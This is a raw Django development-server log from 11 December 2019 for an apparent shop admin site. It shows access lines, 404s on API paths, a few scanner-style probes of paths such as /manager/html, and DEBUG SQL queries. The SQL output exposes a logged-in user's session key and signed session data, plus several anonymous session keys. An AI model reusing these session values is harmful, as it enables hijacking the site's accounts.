HTTP/1.0" 200 1786 [11/Dec/2019 11:00:02] "GET / HTTP/1.0" 302 0 [11/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 11:12:00] "GET / HTTP/1.0" 302 0 [11/Dec/2019 11:17:02] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [11/Dec/2019 11:21:37] "GET /manager/html HTTP/1.0" 404 6629 [11/Dec/2019 11:22:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 11:26:46,948 utils 29827 140579905464064 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T11:26:46.939049+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 11, 26, 46, 939049, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 11:26:46,951 utils 29827 140579905464064 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-11 11:26:46,954 utils 29827 140579905464064 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-11 11:26:46,998 utils 29827 140579905464064 (0.001) DECLARE "_django_curs_140579905464064_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 11:26:47,045 utils 29827 140579905464064 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T11:26:47.042910+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 11, 26, 47, 42910, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 11:26:47] "GET /shop/category/10/change/ HTTP/1.0" 200 8032 DEBUG 2019-12-11 11:26:47,358 utils 29827 140579905464064 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T11:26:47.349565+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 11, 26, 47, 349565, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 11:26:47,361 utils 29827 140579905464064 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [11/Dec/2019 11:26:47] "GET /jsi18n/ HTTP/1.0" 200 3223 [11/Dec/2019 11:27:08] "GET / HTTP/1.0" 302 0 Not Found: /api/v1/subcategory/10 [11/Dec/2019 11:27:29] "GET /api/v1/subcategory/10 HTTP/1.0" 404 7257 Not Found: /api/v1/subcategory/ [11/Dec/2019 11:27:42] "GET /api/v1/subcategory/ HTTP/1.0" 404 7251 [11/Dec/2019 11:30:34] "GET / HTTP/1.0" 302 0 [11/Dec/2019 11:32:10] "GET / HTTP/1.0" 302 0 Not Found: /favicon.ico [11/Dec/2019 11:34:49] "GET /favicon.ico HTTP/1.0" 404 6627 [11/Dec/2019 11:37:13] "GET / HTTP/1.0" 302 0 [11/Dec/2019 11:43:01] "GET / HTTP/1.0" 302 0 [11/Dec/2019 11:45:54] "GET / HTTP/1.0" 302 0 [11/Dec/2019 11:50:57] "GET / HTTP/1.0" 302 0 [11/Dec/2019 11:56:00] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:04:49] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:11:15] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:16:18] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:21:21] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:21:25] "GET / HTTP/1.0" 302 0 Not Found: /api/v1/fire [11/Dec/2019 12:26:19] "GET /api/v1/fire HTTP/1.0" 404 7227 [11/Dec/2019 12:26:23] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:33:22] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:38:25] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:43:27] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:47:46] "GET / HTTP/1.0" 302 0 [11/Dec/2019 12:51:24] "GET / HTTP/1.0" 302 0 Not Found: /api/v1/subcategory/10/products/ [11/Dec/2019 12:51:58] "GET /api/v1/subcategory/10/products/ HTTP/1.0" 404 7287 Not Found: /api/v1/subcategory/10/products/ [11/Dec/2019 12:53:26] "GET /api/v1/subcategory/10/products/ HTTP/1.0" 404 7287 Not Found: /api/v1/subcategory/10/products/ [11/Dec/2019 12:55:39] "GET /api/v1/subcategory/10/products/ HTTP/1.0" 404 7287 Not Found: /api/v1/subcategory/10/products/ [11/Dec/2019 12:56:37] "GET /api/v1/subcategory/10/products/ HTTP/1.0" 404 7287 [11/Dec/2019 12:56:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 12:56:53,452 utils 29827 140579905464064 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 12:56:53,462 utils 29827 140579905464064 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-11 12:56:53,467 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-11 12:56:53,471 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-11 12:56:53,477 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-11 12:56:53,483 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-11 12:56:53,488 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-11 12:56:53,492 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-11 12:56:53,495 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-11 12:56:53,499 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-11 12:56:53,503 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-11 12:56:53,528 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-11 12:56:53,531 utils 29827 140579905464064 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-11 12:56:53,554 utils 29827 140579905464064 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-11T12:56:53.549495+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 11, 12, 56, 53, 549495, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-11 12:56:53,610 utils 29827 140579905464064 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-25T12:56:53.608410+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 25, 12, 56, 53, 608410, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [11/Dec/2019 12:56:53] "GET /api/v1/categories/10/products/ HTTP/1.0" 200 15615 [11/Dec/2019 12:57:24] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 12:57:26,052 utils 29827 140579905464064 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9isr95vwcpqdib6pypodmsh911ue9d2w' LIMIT 1; args=('9isr95vwcpqdib6pypodmsh911ue9d2w',) DEBUG 2019-12-11 12:57:26,055 utils 29827 140579905464064 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9isr95vwcpqdib6pypodmsh911ue9d2w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T12:57:26.052976+00:00'::timestamptz); args=('9isr95vwcpqdib6pypodmsh911ue9d2w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 12, 57, 26, 52976, tzinfo=)) [11/Dec/2019 12:57:26] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /api/v1/subcategory/10/products/ [11/Dec/2019 12:57:28] "GET /api/v1/subcategory/10/products/ HTTP/1.0" 404 7287 [11/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:20:11] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:25:14] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 13:30:16] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:35:19] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:40:22] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:45:25] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:50:28] "GET / HTTP/1.0" 302 0 [11/Dec/2019 13:55:31] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:03:50] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 14:11:56] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:20:19] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:25:22] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 14:33:12] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:42:44] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:47:47] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:52:50] "GET / HTTP/1.0" 302 0 [11/Dec/2019 14:57:52] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:03:29] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:10:04] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:15:07] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:20:10] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:25:13] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [11/Dec/2019 15:26:27] "GET /proxy.php HTTP/1.0" 404 6627 [11/Dec/2019 15:30:15] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:32:19] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:36:36] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:41:38] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:46:54] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:49:34] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:52:00] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:57:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 15:57:24] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:10:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:20:11] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:29:04] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:34:07] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:39:10] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:44:12] "GET / HTTP/1.0" 302 0 [11/Dec/2019 16:53:17] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:00:02] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:10:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:10:18] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-11 17:10:18,940 utils 29827 140579905464064 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'jblyvrbd8a6nwlp865zo1ew0doabjtq7' LIMIT 1; args=('jblyvrbd8a6nwlp865zo1ew0doabjtq7',) DEBUG 2019-12-11 17:10:18,942 utils 29827 140579905464064 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('jblyvrbd8a6nwlp865zo1ew0doabjtq7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T17:10:18.941393+00:00'::timestamptz); args=('jblyvrbd8a6nwlp865zo1ew0doabjtq7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 17, 10, 18, 941393, tzinfo=)) [11/Dec/2019 17:10:18] "GET /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 17:15:09] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [11/Dec/2019 17:15:35] "GET /proxy.php HTTP/1.0" 404 6629 [11/Dec/2019 17:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 17:20:12] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:25:15] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:31:13] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:36:35] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:41:38] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:46:26] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-11 17:46:26,466 utils 29827 140579905464064 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ob7hu2vbk12r90du2pwjaxj4wnl3e723' LIMIT 1; args=('ob7hu2vbk12r90du2pwjaxj4wnl3e723',) DEBUG 2019-12-11 17:46:26,468 utils 29827 140579905464064 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ob7hu2vbk12r90du2pwjaxj4wnl3e723', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T17:46:26.467085+00:00'::timestamptz); args=('ob7hu2vbk12r90du2pwjaxj4wnl3e723', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 17, 46, 26, 467085, tzinfo=)) [11/Dec/2019 17:46:26] "HEAD /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 17:48:34] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 17:48:35,612 utils 29827 140579905464064 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6rnnhfes6fokmyjhvglsznterfxug8et' LIMIT 1; args=('6rnnhfes6fokmyjhvglsznterfxug8et',) DEBUG 2019-12-11 17:48:35,614 utils 29827 140579905464064 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6rnnhfes6fokmyjhvglsznterfxug8et', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T17:48:35.612771+00:00'::timestamptz); args=('6rnnhfes6fokmyjhvglsznterfxug8et', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 17, 48, 35, 612771, tzinfo=)) [11/Dec/2019 17:48:35] "GET /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 17:48:35] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:48:39] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:49:28] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:54:31] "GET / HTTP/1.0" 302 0 [11/Dec/2019 17:59:34] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:05:02] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:20:11] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:25:19] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:30:22] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:38:21] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:42:56] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:43:24] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:48:27] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:53:30] "GET / HTTP/1.0" 302 0 [11/Dec/2019 18:57:24] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-11 18:57:25,270 utils 29827 140579905464064 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6qv44ni97b1i4w3fg6982q2rfa7ddykd' LIMIT 1; args=('6qv44ni97b1i4w3fg6982q2rfa7ddykd',) DEBUG 2019-12-11 18:57:25,272 utils 29827 140579905464064 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6qv44ni97b1i4w3fg6982q2rfa7ddykd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-25T18:57:25.270756+00:00'::timestamptz); args=('6qv44ni97b1i4w3fg6982q2rfa7ddykd', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 25, 18, 57, 25, 270756, tzinfo=)) [11/Dec/2019 18:57:25] "GET /login/?next=/ HTTP/1.0" 200 1786 [11/Dec/2019 18:58:32] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 19:05:02] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:22:38] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:28:40] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:33:43] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:39:57] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:45:00] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 19:50:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 19:55:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:20:11] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:25:14] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:30:16] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:40:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:45:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:50:09] "GET / HTTP/1.0" 302 0 [11/Dec/2019 20:55:12] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:10:28] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:18:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:23:09] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:28:12] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:33:14] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:38:17] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:43:20] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:48:22] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:53:25] "GET / HTTP/1.0" 302 0 [11/Dec/2019 21:58:28] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:10:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:16:33] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:21:52] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:26:55] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:31:58] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:37:01] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 22:42:04] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:48:06] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:53:09] "GET / HTTP/1.0" 302 0 [11/Dec/2019 22:58:12] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:20:11] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:25:24] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:30:27] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:35:30] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:40:33] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [11/Dec/2019 23:45:35] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:51:48] "GET / HTTP/1.0" 302 0 [11/Dec/2019 23:56:51] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 